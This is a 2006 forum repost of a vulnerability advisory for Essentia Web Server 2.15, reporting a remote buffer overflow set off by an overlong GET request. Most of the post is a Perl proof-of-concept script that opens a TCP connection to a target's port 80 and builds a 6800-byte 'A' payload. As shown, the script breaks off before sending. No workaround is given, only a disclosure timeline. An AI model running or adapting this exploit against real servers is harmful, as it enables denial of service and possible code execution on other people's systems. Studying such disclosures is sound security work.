escalation666 Posted November 10, 2006 Report Posted November 10, 2006 Essentia Web Server V 2.15 Author:CorryL x0n3-h4ck.org-=[-----------------------------------------------]=--=[+] Application: Essentia Web Server-=[+] Version: 2.15-=[+] Vendor's URL: http://www.essencomp.com-=[+] Platform: Windows -=[+] Bug type: Buffer overflow-=[+] Exploitation: Remote -=[-]-=[+] Author: CorryL ~ corryl80[at]gmail[dot]com ~-=[+] Reference: http://www.x0n3-h4ck.org-=[+] Virtual Office: http://www.kasamba.com/CorryL..::[ Descriprion ]::..Providing enhanced Web Application and Communication Services, this is a high performance scalable web server that supports thousands of virtual servers...::[ Bug ]::..This software is affection from a buffer overflowwhat it would allow an attacker to perform arbitrary codeon the system victim.Sending a GET+Ax6800 request, he would succeed to write above the seh point...::[ Proof Of Concept ]::..#!/usr/bin/perluse IO::Socket;use Getopt::Std; getopts('h:', %args);if (defined($args{'h'})) { $host = $args{'h'}; }print STDERR "n-=[ Essentia Web Server 2.15 Remote DOS Exploit]=-n";print STDERR "-=[ Discovered By CorryL [mail]corryl80@gmail.com[/mail] ]=-n";print STDERR "-=[ Coded by CorryL info:www.x0n3-h4ck.org ]=-nn";if (!defined($host)) {Usage();}$dos = "A"x6800;print "[+] Connect to $hostn";$socket = new IO::Socket::INET (PeerAddr => "$host", PeerPort => 80, Proto => 'tcp'); die unless $socket;print "[+] Sending DOS byten"; $data = "GET /$dos rnrn";..::[ Workaround ]::..nothing..::[ Disclousure Timeline ]::..[30/10/2006] - Vendor notification[04/11/2006] – No Vendor Response[04/11/2006] - Public disclousure Quote
